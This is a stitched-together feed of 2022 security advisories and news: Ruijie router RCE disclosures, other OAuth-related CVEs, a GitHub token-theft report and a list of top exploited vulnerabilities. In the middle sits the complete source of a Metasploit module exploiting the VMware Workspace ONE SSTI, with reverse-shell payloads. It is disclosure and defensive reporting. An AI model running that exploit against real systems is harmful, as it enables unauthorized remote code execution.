In H3C MagicR100 <=V100R005, the / Ajax / ajaxget interface can be accessed without authorization. It sends a large amount of data through ajaxmsg to carry out DOS attack.

CVE-2022-28940: 0day/新华三magicR100存在DOS攻击漏洞分析.md at main · zhefox/0day

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55 via the updateVersion function in /cgi-bin/luci/api/wireless.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Minh-Khoa Tran <khoa () posteo de>  
_Date_: Mon, 02 May 2022 12:13:18 +0000  

Advisory: Multiple Vulnerabilities in Ruijie RG-EW Series Routers

=======
Summary
=======

Multiple vulnerabilities was found in Ruijie RG-EW Series Routers from
Ruijie Networks, including 1 pre-authenticated and 5 post-authenticated
Remote Code Execution (RCE).

==============
CVE-2021-43159
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW\_3.0(1)B11P55
via the setSessionTime function in /cgi-bin/luci/api/common.

## Details

- Type: Post-authenticated RCE / Command Injection
- Discoverer: Minh Khoa of VSEC
- Affected Component:
    File: /usr/lib/lua/luci/modules/common.lua
    Function: setSessionTime
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============
CVE-2021-43160
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW\_3.0(1)B11P55
via the switchFastDhcp function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection
- Discoverer: Minh Khoa of VSEC
- Affected Component:
    File: /usr/lib/lua/luci/modules/diagnose.lua
    Function: switchFastDhcp
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============
CVE-2021-43161
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW\_3.0(1)B11P55
via the doSwitchApi function in /cgi-bin/luci/api/switch.

## Details
- Type: Post-authenticated RCE / Command Injection
- Discoverer: Minh Khoa of VSEC
- Affected Component:
    File: /usr/lib/lua/luci/modules/switch.lua
    Function: doSwitchApi
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============
CVE-2021-43162
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW\_3.0(1)B11P55
via the runPackDiagnose function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection
- Discoverer: Minh Khoa of VSEC
- Affected Component:
    File: /usr/lib/lua/luci/modules/diagnose.lua
    Function: runPackDiagnose
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============
CVE-2021-43163
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW\_3.0(1)B11P55
via the checkNet function in /cgi-bin/luci/api/auth.

## Details

- Type: Pre-authenticated RCE / Command Injection
- Discoverer: Minh Khoa of VSEC
- Affected Component:
    File: /usr/lib/lua/luci/modules/noauth.lua
    Function: checkNet
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============
CVE-2021-43164
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW\_3.0(1)B11P55
via the updateVersion function in /cgi-bin/luci/api/wireless.

## Details

- Type: Post-authenticated RCE / Command Injection
- Discoverer: Minh Khoa of VSEC
- Affected Component:
    File: /usr/lib/lua/luci/modules/wireless.lua
    Function: updateVersion
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

--
Khoa
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Multiple Vulnerabilities in Ruijie RG-EW Series Routers** _Minh-Khoa Tran (May 02)_

CVE-2021-43164: Multiple Vulnerabilities in Ruijie RG-EW Series Routers

Mattermost Playbooks plugin 1.25 and earlier fails to properly restrict user-level permissions, which allows playbook members to escalate their membership privileges and perform actions restricted to playbook admins.

CVE-2022-1548: Security Updates

By providing these apps and other add-ons for SaaS platforms and associated permissions, businesses present bad actors with more opportunities to gain access to company data.

Actions that a user takes from creating an email to updating a contact in the CRM system can result in several other automatic actions and notifications in the connected platforms. However, this SaaS-to-SaaS communication and supply chain is an emerging threat in the corporate cybersecurity landscape.

It bears repeating: Third-party app access is the new executable file. An innocuous process much like clicking on an email attachment, people don't think twice when connecting an app they need with their Google Workspace or Microsoft 365 environment. These third-party apps can boost productivity, enable remote and hybrid work, and are overall essential in building and scaling a company's work processes.

The OAuth mechanism makes it extremely easy to interconnect apps, and many users simply click "accept" without considering what permissions these apps are asking for — or what the possible ramifications could be. By providing these apps and other add-ons for SaaS platforms with permissions' access, businesses are presenting more opportunities for bad actors to gain access to a company's data. This puts companies at risk for supply chain access attacks, API takeovers, and malicious third-party apps. Once a bad actor is able to infiltrate one platform, they potentially have access to all of the users' connected SaaS apps.

Nowadays, when it comes to local machines and executable files, organizations already have control built in that enables security teams to block problematic programs and files. It needs to be the same when it comes to SaaS apps.

We conducted field research from within our customers' environments to identify just how many third-party apps were connected to their instances of Google Workspace, M365, and Salesforce. On average, there were approximately 150 SaaS apps connected to these business-critical apps**,** unbeknownst to the security team.

OAuth 2.0 has greatly simplified authentication and authorization, and offers a fine-grained delegation of access rights. Represented in the form of scopes, an application asks for the user's authorization for specific permissions. An app can request one or more scopes. Through approval of the scopes, the user grants these apps permissions to execute code to perform logic behind the scenes within their environment. These apps can be harmless or as threatening as an executable file.

Third-party app access is just one component of the SaaS security posture management picture. Recent surveys have shown that an enterprise with 1,000 or more employees is likely to use more than 150 SaaS apps to run the business. While each individual SaaS app comes with built-in native security controls, it is up to the organization to ensure that all the configurations and user permissions are correct.

Further complicating matters is the fact that no two apps are the same — each has unique terminology, environment, and organization of their security configurations. Understanding every app's "language" and managing the complex, ever-changing environment, now with the additional third-party app access risk, opens organizations up to even more exposure and vulnerability.

**Best Practices to Mitigate Third-Party App Access Risk  
**To secure a company's SaaS stack, the security team needs to be able to identify and monitor all that happens within their SaaS ecosystem. Here's what a security team can share with employees and handle themselves to mitigate third-party app access risk. 

**Educate Employees  
**The first step in cybersecurity always comes back to raising awareness. Once employees become more aware of the risks and dangers that these OAuth mechanisms present, they will be more hesitant to use them. Organizations should also create a policy that requires employees to submit requests for third-party apps.

**Get Visibility Into Third-Party Access for All Business-Critical Apps  
**Security teams should gain visibility into every business-critical app and review all the different third-party apps that have been integrated with their business-critical SaaS apps — across all tenets. One of the first steps when shrinking the threat surface is gaining an understanding of the full environment.

**Map Permissions and Access Levels Requested by Connected Third-Party Apps  
**Once the security team knows which third party apps are connected, it should map the permissions and the types of access that each third-party app has been given. From there, it will be able to see which third-party app presents a higher risk. Being able to differentiate between an app that can read versus an app that can write will help the security team prioritize which needs to be handled first.

In addition, the security team should map which users granted these permissions. For example, a high-privileged user, someone who has sensitive documents in their workspace, who grants access to a third-party app can present a high risk to the company, and this needs to be remediated immediately.

These best practices are just the start for a cybersecurity department to better ensure its organization's SaaS security hygiene remains intact.

Third-Party App Access Is the New Executable File

The vulnerability is that IDToken verifier does not verify if token is properly signed. Signature verification makes sure that the token's payload comes from valid provider, not from someone else. An attacker can provide a compromised token with custom payload. The token will pass the validation on the client side. We recommend upgrading to version 1.33.3 or above

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-22573: chore(main): release 1.33.3 by release-please[bot] · Pull Request #872 · googleapis/google-oauth-java-client

This Metasploit module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) vulnerability in VMware Workspace ONE Access, to execute shell commands as the horizon user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware Workspace ONE Access CVE-2022-22954',        'Description' => %q{          This module exploits CVE-2022-22954, an unauthenticated server-side          template injection (SSTI) in VMware Workspace ONE Access, to execute          shell commands as the "horizon" user.        },        'Author' => [          'mr_me', # Discovery          'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC          'wvu' # Exploit and independent analysis        ],        'References' => [          ['CVE', '2022-22954'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],          ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],          ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],          ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']          # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433        ],        'DisclosureDate' => '2022-04-06',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    ret = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")    return CheckCode::Unknown unless ret    return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)    CheckCode::Vulnerable  end  def exploit    print_status("Executing #{payload_instance.refname} (#{target.name})")    case target['Type']    when :cmd      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  end  def execute_command(cmd, _opts = {})    bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}"    vprint_status("Executing command: #{bash_cmd}")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, ssti_uri),      'vhost' => rand_text_alphanumeric(8..16),      'vars_get' => {        %w[code error].sample => rand_text_alphanumeric(8..16),        # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html        ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})      }    }, 3.5)    return unless res    return '' unless res.code == 400 && res.body.include?('auth.context.invalid')    res.body  end  def ssti_uri    %w[      /catalog-portal/hub-ui      /catalog-portal/hub-ui/byob      /catalog-portal/ui      /catalog-portal/ui/oauth/verify    ].sample  end  def ssti_param    %w[deviceType deviceUdid].sample  endend

VMware Workspace ONE Access Template Injection / Command Execution

Ruijie RG-EW series routers suffer from six different remote code execution vulnerabilities. Findings were tested on Ruijie RG-EW1200 and Ruijie RG-EW1200G PRO.

Advisory: Multiple Vulnerabilities in Ruijie RG-EW Series Routers

=======  
Summary  
=======

Multiple vulnerabilities was found in Ruijie RG-EW Series Routers from  
Ruijie Networks, including 1 pre-authenticated and 5 post-authenticated  
Remote Code Execution (RCE).

==============  
CVE-2021-43159  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the setSessionTime function in /cgi-bin/luci/api/common.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/common.lua  
     Function: setSessionTime  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43160  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the switchFastDhcp function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/diagnose.lua  
     Function: switchFastDhcp  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43161  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the doSwitchApi function in /cgi-bin/luci/api/switch.

## Details  
- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/switch.lua  
     Function: doSwitchApi  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43162  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the runPackDiagnose function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/diagnose.lua  
     Function: runPackDiagnose  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43163  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the checkNet function in /cgi-bin/luci/api/auth.

## Details

- Type: Pre-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/noauth.lua  
     Function: checkNet  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43164  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the updateVersion function in /cgi-bin/luci/api/wireless.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/wireless.lua  
     Function: updateVersion  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

--   
Khoa

Ruijie RG-EW Remote Code Execution

An issue was discovered in Logitech Options. The OAuth 2.0 state parameter was not properly validated. This leaves applications vulnerable to CSRF attacks during authentication and authorization operations.

*   Register
*   Getting Started
*   FAQ
*   Community
*   Downloads
*   Warranty
*   Specifications
*   Spare Parts
*   Gallery
*   Contact Us

**There are no Downloads for this Product**

**There are no FAQs for this Product**

**There are no Spare Parts available for this Product**

Logitech Options

More

Check our Logitech Warranty here

**Make the Most of your warranty**

Register Your Product FIle a Warranty Claim

**Frequently Asked Questions**

*   Windows
    
    {\[{versionList\[key\]}\]}
    
    Mac
    
    {\[{versionList\[key\]}\]}
    
    Other
    
    {\[{versionList\[key\]}\]}
    

**There are no Downloads for this Version.**

Show All Downloads

**Compatible Product**

**Product Specific Phone Numbers**

**Main Phone Numbers**

CVE-2022-0916: Logitech Options

Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature.
"This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an

Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature.

"This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an updated post.

The security incident, which it discovered on April 12, related to an unidentified attacker leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM.

The Microsoft-owned company said last week that it's in the process of sending a final set of notifications to GitHub customers who had either the Heroku or Travis CI OAuth app integrations authorized in their accounts.

According to a detailed step-by-step analysis carried out by GitHub, the adversary is said to have employed the stolen app tokens to authenticate to the GitHub API, using it to list all the organizations of affected users.

This was then succeeded by selectively choosing targets based on the listed organizations, following it up by listing the private repositories of valuable users accounts, before moving to clone some of those private repositories ultimately.

The company also reiterated that the tokens were not obtained via a compromise of GitHub or its systems, and that the tokens are not stored in their "original, usable formats," which could be misused by an attacker.

"Customers should also continue to monitor Heroku and Travis CI for updates on their own investigations into the affected OAuth applications," GitHub noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

GitHub Says Recent Attack Involving Stolen OAuth Tokens Was "Highly Targeted"

International cybersecurity authorities have published an overview of the most routinely exploited vulnerabilities of 2021.
The post The top 5 most routinely exploited vulnerabilities of 2021 appeared first on Malwarebytes Labs.

A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.

**1\. Log4Shell**

CVE-2021-44228, commonly referred to as Log4Shell or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.

When Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.

This made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.

The Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The CISA Log4j scanner is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.

**2\. CVE-2021-40539**

CVE-2021-40539 is a REST API authentication bypass vulnerability in ManageEngine’s single sign-on (SSO) solution with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that APT threat-actors were likely among those exploiting the vulnerability.

The vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.

For those that have never heard of this software, it’s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.

The ManageEngine site has specific instructions on how to identify and update vulnerable installations.

**3\. ProxyShell**

Third on the list are 3 vulnerabilities that we commonly grouped together and referred to as ProxyShell. CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207.

The danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:

*   **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.
*   **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.
*   **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.

The vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.

Microsoft’s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.

**4\. ProxyLogon**

After the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name—ProxyLogon—for similar reasons. CVE-2021-26855, CVE-2021-26857, CVE-2021-2685, and CVE-2021-27065 all share the same description—”This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.”

While the CVE description is the same for the 4 CVE’s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws—CVE-2021-26858 and CVE-2021-27065—would allow an attacker to write a file to any part of the server.

Together these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.

ProxyLogon started out as a limited and targeted attack method attributed to a group called Hafnium. Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

Microsoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a download link, user instructions, and more information can be found in the Microsoft Security Response Center.

**5\. CVE-2021-26084**

CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of Confluence Server and Data Center that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.

Shortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.

On the Confluence Support website you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.

**Lessons learned**

What does this list tell us to look out for in 2022?

Well, first off, if you haven’t patched one of the above we would urgently advise you to do so. And it wouldn’t hurt to continue working down the list provided by CISA.

Second, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:

*   **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.
*   **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.
*   **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.

So, if you notice or hear about a vulnerability that meets these “requirements” move it to the top of your “to-patch” list.

Stay safe, everyone!

Tag

#oauth